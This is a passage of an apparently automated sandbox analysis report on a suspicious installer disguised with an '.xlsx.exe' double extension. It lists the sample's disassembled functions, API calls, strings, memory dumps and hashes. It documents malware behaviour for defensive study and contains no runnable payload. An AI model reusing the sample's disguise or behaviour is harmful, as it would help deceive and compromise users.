                                                          • ShowWindow.USER32(?,?), ref: 00405531
                                                          • ShowWindow.USER32(?), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B
                                                          • API String ID: 590372296-2518801558
                                                          • Opcode ID: c0326886d2318a88a78635f0047d6771461a0522e5dc035da93f56fe400bf1bd
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: c0326886d2318a88a78635f0047d6771461a0522e5dc035da93f56fe400bf1bd
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                          Function 00405F6A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 426 405fb7-405fbe 422->426 424 4061c2-4061cd 423->424 425 405fc3-405fd0 423->425 428 4061d8-4061d9 424->428 429 4061cf-4061d3 call 405f48 424->429 425->424 427 405fd6-405fe2 425->427 426->423 430 4061a3 427->430 431 405fe8-406024 427->431 429->428 433 4061b1-4061b4 430->433 434 4061a5-4061af 430->434 435 406144-406148 431->435 436 40602a-406035 GetVersion 431->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 441 40603d-406041 437->441 444 406056-40605d 438->444 442 406150-40615c call 405e8f 439->442 443 40615e-40616b call 405f48 439->443 445 406190-4061a1 lstrlenW 440->445 446 406183-40618b call 405f6a 440->446 441->438 448 406043-406047 441->448 457 406170-406179 442->457 443->457 450 406062-406064 444->450 451 40605f-406061 444->451 445->423 446->445 448->438 453 406049-40604d 448->453 455 4060a0-4060a3 450->455 456 406066-406083 call 405e15 450->456 451->450 453->444 458 4060b3-4060b6 455->458 459 4060a5-4060b1 GetSystemDirectoryW 455->459 465 406088-40608c 456->465 457->445 461 40617b 457->461 463 406121-406123 458->463 464 4060b8-4060c6 GetWindowsDirectoryW 458->464 462 406125-406129 459->462 466 40613c-406142 call 4061dc 461->466 462->466 467 40612b-40612f 462->467 463->462 469 4060c8-4060d2 463->469 464->463 465->467 470 406092-40609b call 405f6a 465->470 466->445 467->466 472 406131-406137 lstrcatW 467->472 474 4060d4-4060d7 469->474 475 4060ec-406102 SHGetSpecialFolderLocation 469->475 470->462 472->466 474->475 477 4060d9-4060e0 474->477 478 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->478 479 40611d 475->479 480 4060e8-4060ea 477->480 478->462 478->479 479->463 480->462 480->475
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(Call,?), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(Call,?), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-3587725775
                                                          • Opcode ID: 89a2242da9b4bbc605b67f2f009b40da19baa1a0849ba18391ac33b03fc270f4
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: 89a2242da9b4bbc605b67f2f009b40da19baa1a0849ba18391ac33b03fc270f4
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                          Function 004057D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 481 4057d0-4057f6 call 405a9b 484 4057f8-40580a DeleteFileW 481->484 485 40580f-405816 481->485 486 40598c-405990 484->486 487 405818-40581a 485->487 488 405829-405839 call 405f48 485->488 489 405820-405823 487->489 490 40593a-40593f 487->490 496 405848-405849 call 4059df 488->496 497 40583b-405846 lstrcatW 488->497 489->488 489->490 490->486 492 405941-405944 490->492 494 405946-40594c 492->494 495 40594e-405956 call 40628b 492->495 494->486 495->486 505 405958-40596c call 405993 call 405788 495->505 499 40584e-405852 496->499 497->499 501 405854-40585c 499->501 502 40585e-405864 lstrcatW 499->502 501->502 504 405869-405885 lstrlenW FindFirstFileW 501->504 502->504 506 40588b-405893 504->506 507 40592f-405933 504->507 521 405984-405987 call 4051f2 505->521 522 40596e-405971 505->522 509 4058b3-4058c7 call 405f48 506->509 510 405895-40589d 506->510 507->490 512 405935 507->512 523 4058c9-4058d1 509->523 524 4058de-4058e9 call 405788 509->524 513 405912-405922 FindNextFileW 510->513 514 40589f-4058a7 510->514 512->490 513->506 520 405928-405929 FindClose 513->520 514->509 517 4058a9-4058b1 514->517 517->509 517->513 520->507 521->486 522->494 527 405973-405982 call 4051f2 call 405de2 522->527 523->513 528 4058d3-4058dc call 4057d0 523->528 532 40590a-40590d call 4051f2 524->532 533 4058eb-4058ee 524->533 527->486 528->513 532->513 536 4058f0-405900 call 4051f2 call 405de2 533->536 537 405902-405908 533->537 536->513 537->513
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 0040586A
                                                          • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          • "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", xrefs: 004057D9
                                                          • \*.*, xrefs: 0040583B
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-3281266623
                                                          • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                          • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                          • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                          • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                          Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                          • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                          Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,75572EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          Function 004062B2 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                          • LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                          • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                          • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                          Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 004020BD
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 004020FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling
                                                          • API String ID: 542301482-3871883919
                                                          • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                          • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                          • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                          • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                          Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                          • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                          • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                          • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                          Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 181 403ec8-403ecd call 4041e6 177->181 182 403e8a-403e8d 177->182 178->177 183 403cf1-403cfe SetWindowPos 179->183 184 403d04-403d07 179->184 196 403ed2-403eed 181->196 188 403ec0-403ec2 182->188 189 403e8f-403e9a call 401389 182->189 183->184 185 403d21-403d27 184->185 186 403d09-403d1b ShowWindow 184->186 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->181 195 404167 188->195 189->188 210 403e9c-403ebb SendMessageW 189->210 200 403d48-403d54 SetWindowLongW 191->200 201 403d59-403d5f 191->201 198 404144-40414a 192->198 197 404169-404170 195->197 203 403ef6-403efc 196->203 204 403eef-403ef1 call 40140b 196->204 198->195 211 40414c-404152 198->211 200->197 208 403e02-403e10 call 404201 201->208 209 403d65-403d76 GetDlgItem 201->209 206 403f02-403f0d 203->206 207 404125-40413e DestroyWindow EndDialog 203->207 204->203 206->207 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 206->213 207->198 208->197 214 403d95-403d98 209->214 215 403d78-403d8f SendMessageW IsWindowEnabled 209->215 210->197 211->195 212 404154-40415d ShowWindow 211->212 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->208 227 403de9-403dfc SendMessageW 223->227 228 403daa-403dac 223->228 224->227 229 403db5-403dbb 224->229 227->208 228->222 230 403dd2-403ddb call 40140b 229->230 231 403dbd-403dc3 call 40140b 229->231 230->208 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->198 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->198 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->198
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
